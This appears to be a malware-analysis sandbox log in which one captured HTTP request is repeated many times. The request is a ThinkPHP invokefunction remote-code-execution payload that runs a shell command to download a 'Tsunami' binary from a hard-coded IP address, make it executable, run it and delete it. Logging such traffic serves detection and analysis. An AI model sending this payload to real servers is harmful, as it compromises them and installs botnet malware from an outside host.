Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
